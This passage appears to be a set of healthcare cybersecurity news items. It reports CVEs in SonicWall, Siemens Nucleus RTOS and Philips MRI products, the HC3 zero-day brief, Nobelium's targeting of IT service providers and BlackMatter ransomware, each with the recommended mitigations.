• CVE-2021-20041 has a CVSS score of 7.5. It is an unauthenticated CPU exhaustion vulnerability.
• CVE-2021-20043 has a CVSS score of 8.8. It is a heap-dependent buffer overflow vulnerability that permits remote code execution. But an attacker should be authenticated.
• CVE-2021-20044 has a CVSS score of 7.2. It is a post-authentication remote code execution vulnerability.
• CVE-2021-20039 has a CVSS score of 7.2. It is an authenticated command injection vulnerability.

Two medium-severity vulnerabilities were likewise resolved:

• CVE-2021-20042 has a CVSS score of 6.3. It is an unauthenticated ‘confused deputy’ vulnerability.
• CVE-2021-20040 has a CVSS score of 6.5. It is an unauthenticated file upload path traversal vulnerability.

The software update is available at MySonicWall.com and ought to be used without delay to avert exploitation. SonicWall states no temporary mitigations could be applied to stop the exploitation of the vulnerabilities.

The HHS’ Health Sector Cybersecurity Coordination Center (HC3) has given the healthcare and public health industry an alert regarding a surge in financially driven zero-day attacks, setting out mitigation techniques that ought to be followed to decrease risk to a low and acceptable level.

A zero-day attack exploits a vulnerability for which there is no patch yet. The vulnerabilities are known as zero-day since the developer has not released a patch yet to resolve the flaw.

Zero-day attacks are attacks that a threat actor has launched using a weaponized exploit for a zero-day vulnerability. Zero-day vulnerabilities are used in attacks on all industry fields and are not just a challenge for the healthcare market. As an example, in 2010, exploits were created for four zero-day vulnerabilities in the “Stuxnet” attack on the Iranian nuclear program, which prompted Iranian centrifuges to self-destruct to interrupt Iran’s nuclear program.

Lately, in 2017, a zero-day vulnerability was taken advantage of to deliver the Dridex banking Trojan. Although it would typically be required for a person to take more actions after opening a malicious email attachment to download malware, by including a zero-day vulnerability exploit the cybercriminals are able to install the Dridex banking Trojan if a person merely opened an infected file attachment.

The very nature of zero-day vulnerabilities suggests it isn’t possible to remove risk completely, as software developers ought to create patches to correct the vulnerabilities, however, techniques can be used to minimize the possibilities for zero-day vulnerabilities to be leveraged.

The number of identified zero-day vulnerability exploits increased more than double between 2019 and 2021. This is partly because of the high price of exploits for zero-day vulnerabilities. The cost spent for working exploits increased by over 1,150% from 2018 to 2021. Though the market for zero-day exploits was restricted to a few groups with lots of money, there are now a lot of threat actors with substantial resources that are ready to pay because they know they could get their money back a number of times over by utilizing the exploits during attacks. At this point, a zero-day vulnerability exploit may be worth over $1 million.

Zero-day attacks particularly performed against the healthcare segment are very possible. In August this year, a zero-day vulnerability called PwnedPiper was discovered in the pneumatic tube systems utilized in hospitals to transfer biological samples and medicines. The vulnerability was discovered in the control panel, which will permit unsigned firmware updates to be employed. An attacker could take advantage of the vulnerability and seize control of the system and release ransomware.

In August 2020, four zero-day vulnerabilities were found that compromised OpenClinic patients’ test findings. Unauthenticated attackers can successfully obtain files that contain sensitive files from the medical test directory, which includes medical test data.

The best protection against zero-day vulnerabilities is to apply the patch immediately, however, patching is frequently slow, particularly in healthcare. A 2019 survey carried out by the Ponemon Institute showed that it took an average of 97 days to use, test, and deploy a patch for a zero-day vulnerability after the release of the patch.

The recommendation of HC3 is to “patch quickly, patch regularly, patch totally.” HC3 gives up-to-date data on actively exploited zero-days and the ready patches to correct zero-day vulnerabilities. HC3 additionally recommends employing a web-application firewall to assess incoming traffic and remove malicious input, since this can stop threat actors from getting access to vulnerable systems. It is likewise recommended to utilize runtime application self-protection (RASP) agents, which are inside applications’ runtime and can identify an anomalous pattern. Segmenting networks is likewise highly recommended.

The TLP: WHITE Zero-Day Threat Brief may be downloaded here.

13 vulnerabilities were discovered in the Siemens Nucleus RTOS TCP/IP stack that threat actors can potentially exploit remotely to carry out arbitrary code execution, do a denial-of-service attack, and acquire sensitive data.

The vulnerabilities, referred to as NUCLEUS:13, are found to have an affect on the TCP/IP stack and linked FTP and TFTP services of the (Nucleus NET) of the Nucleus Real-Time Operating System (RTOS). This networking component is utilized in numerous safety-critical devices. The healthcare sector has medical devices that use Nucleus for example patient monitors and anesthesia machines.

One of the critical vulnerabilities that have a CVSS v3 severity score of 9.8 out of 10 could permit remote code execution. Ten high severity vulnerabilities have CVSS scores between 7.1 and 8.8. Two medium-severity vulnerabilities have CVSS scores of 5.3 and 6.5.

Forescout Research Labs’ security researchers identified the vulnerabilities. Researchers at Medigate provided them with assistance.

These Nucleus RTOS products are affected by the vulnerabilities:

• Nucleus NET: All versions
• Capital VSTAR: All versions
• Nucleus Source Code: All versions
• Nucleus ReadyStart v4: All versions before v4.1.1
• Nucleus ReadyStart v3: All versions before v2017.02.4

Determining where a vulnerable code is utilized is a problem. The researchers tried to calculate the effect of the vulnerabilities according to facts gathered from the official nucleus site, the Forescout device cloud, and the Shodan search engine. Healthcare is the most severely impacted sector. There were 2,233 vulnerable healthcare devices identified as vulnerable. There were 1,066 government devices, 348 retail devices, 326 financial devices, and 317 manufacturing devices identified as vulnerable. In other industry sectors, 1,176 vulnerable devices were found. The use of the vulnerable devices is as follows: 76% for creating automation, 13% in operational technology, 5% IoT, 4% for networking, and 2% were computers operating on Nucleus.

The report about the vulnerabilities was submitted to Siemens as required in the responsible disclosure guidelines. Siemens already released patches to correct all the vulnerabilities that were discovered. Siemens stated a number of the vulnerabilities were discovered and resolved in earlier versions released, however, no CVEs were given.

Using patches to correct the vulnerabilities could be difficult, particularly for embedded devices as well as devices with a mission-critical nature, like devices employed in healthcare services.

In case it’s not possible to apply the patches, Forescout and Siemens suggest employing mitigating measures to minimize the opportunity for exploitation of the vulnerabilities. Siemens advises securing network access to vulnerable devices with best-suited mechanisms and making sure the devices are used in protected IT areas that were set up according to Siemens’ operational instructions.

Forescout has introduced an open-source script with active fingerprinting to identify devices using Nucleus for purposes of discovery and inventory. After locating the devices, Forescout suggests implementing segmentation controls and doing appropriate network hygiene, such as limiting external communication paths and separating or controlling vulnerable devices in a certain place until eventually they could be patched.

Additionally, progressive patches offered by vendors of impacted devices ought to be supervised and all network traffic should be inspected for malicious traffic. A remediation plan must be created for all vulnerable property that balances business continuity demands with risk.

There were three medium severity vulnerabilities found in Philips MRI products, which an unauthorized person can exploit to be able to run the software program, alter the device settings, access and update files, and export information, which include protected health information (PHI), to an untrusted location.

Aguilar discovered inadequate access controls which did not limit access by unauthorized persons (CVE-2021-3083), the software designates an owner who is beyond the designed control sphere (CVE-2021-3085), and sensitive information is exposed to persons who must not be given access (CVE-2021-3084). The three vulnerabilities had an assigned CVSS V3 base rating of 6.2 out of 10.

Secureworks Adversary Group consultant, Michael Aguilar, identified the vulnerabilities. The vulnerabilities have an impact on MRI 3T: Version 5.x.x and Philips MRI 1.5T: Version 5.x.x. Aguilar told Philips about the vulnerabilities and scheduled a patch to be released on October 2022. Meanwhile, Philips advises the implementation of mitigating steps to stop the exploitation of the vulnerabilities.

The mitigations consist of just running the Philips MRI machines based on authorized criteria, making sure physical and logical settings are applied. Only authorized individuals must be permitted to access the location of the MRI machines, and all the information for utilizing the machines furnished by Philips ought to be observed.

Philips did not receive any report of exploitation of the vulnerabilities. There were also no reports of incidents the products had been clinically used in connection with the three vulnerabilities.

The advanced persistent threat (APT) actor Nobelium (also known as Cozy Bear; APT29) that was responsible for the 2020 SolarWinds supply chain attack is attacking managed service providers (MSPs), cloud service providers (CSPs), and other IT service providers, based on the latest advisory from Microsoft.

Instead of executing attacks on a lot of companies and institutions, Nobelium is opting for a compromise-one-to-compromise-many strategy. This can be done since service providers are frequently provided administrative access to the networks of customers to enable them to deliver IT services. Nobelium is seeking to take advantage of that privileged access to execute attacks on downstream organizations and is executing attacks as of May 2021.

Nobelium utilizes a number of strategies to compromise the systems of service providers, such as token theft, phishing and spear-phishing attacks, malware, API abuse, supply chain attacks, and password spraying attacks on accounts utilizing often utilized passwords as well as passwords that were compromised in past data breaches.

As soon as access to service providers’ networks is obtained, Nobelium goes laterally in the cloud then utilizes the trusted access to carry out attacks on downstream organizations utilizing trusted channels for example externally facing VPNs or the special software tools employed by service providers to gain access to customers’ sites.

A few of the attacks carried out by Nobelium were extremely sophisticated and required chaining together artifacts and getting access to several service providers so as to attain their end target.

Microsoft Threat Intelligence Center (MSTIC) has created a number of instructions for companies and downstream businesses to assist with remediation and mitigation.

MSPs and CPSs that depend on elevated privileges to deliver services to their clients were told to confirm and keep track of compliance with Microsoft Partner Center security specifications, which consist of permitting multifactor authentication and implementing conditional access guidelines, using the Secure Application Model Framework, examining activity records and tracking user activities, and taking away assigned administrative privileges that are not used anymore.

All downstream companies that count on service providers having administrative access were instructed to evaluate, review, and lessen access privileges and assigned permissions, such as hardening and tracking all tenant administrator accounts and going over service provider permissions access from local and B2B accounts. They must additionally confirm MFA is enabled and conditional access guidelines are being implemented and routinely examine audit records and settings.

Microsoft has posted complete information on Nobelium’s tactics, techniques, and procedures (TTP) in its advisory to assist IT security teams to prevent, identify, investigate, and minimize attacks.

The Federal Bureau of Investigation (FBI), National Security Agency (NSA), and the Cybersecurity and Infrastructure Security Agency (CISA) issued a joint alert about continuing BlackMatter ransomware attacks.

The group has been executing attacks in the U.S. starting July 2021. It has launched attacks on critical infrastructure entities and two establishments in the U.S. Food and Agriculture Sector. Proof has been acquired that associates the gang to the DarkSide ransomware group that carried out attacks between September 2020 and May 2021. The attack on Colonial Pipeline with the BlackMatter ransomware is possibly a rebrand of the DarkSide campaigns.

Investigations into the attacks have given agencies crucial information regarding the tactics, techniques, and procedures (TTPs) of the group, and an evaluation has been done on a sample of the ransomware in a sandbox environment.

The ransomware gang is well-known to utilize previously compromised credentials to obtain access to the networks of victims, then leverages the Lightweight Directory Access Protocol (LDAP) and Server Message Block (SMB) to gain access to the Active Directory (AD) and find all hosts on the network. The BlackMatter gang deploys ransomware then encrypts the hosts and shared drives remotely as they are found. The group has been known to exfiltrate information and usually demands ransom payments of about $80,000 to $15 million in Monero or Bitcoin.

In the joint notification, the NSA, FBI, and CISA discussed TTPs, provide Snort signatures that may be utilized for discovering the network activity connected with BlackMatter ransomware attacks, and a number of mitigations to minimize the threat of an attack by the gang.

Mitigations consist of:

1. Employing detection signatures to recognize and obstruct attacks in progress
2. Utilizing strong passwords resilient to brute force attacks
3. Using multi-factor authentication to prevent the employment of stolen credentials
4. Patching and updating systems immediately
5. Restricting access to resources over networks
6. Using network segmentation and traversal monitoring
7. Employing admin disabling tools to support identity and privileged access control
8. Applying and enforcing backup and restoration guidelines and procedures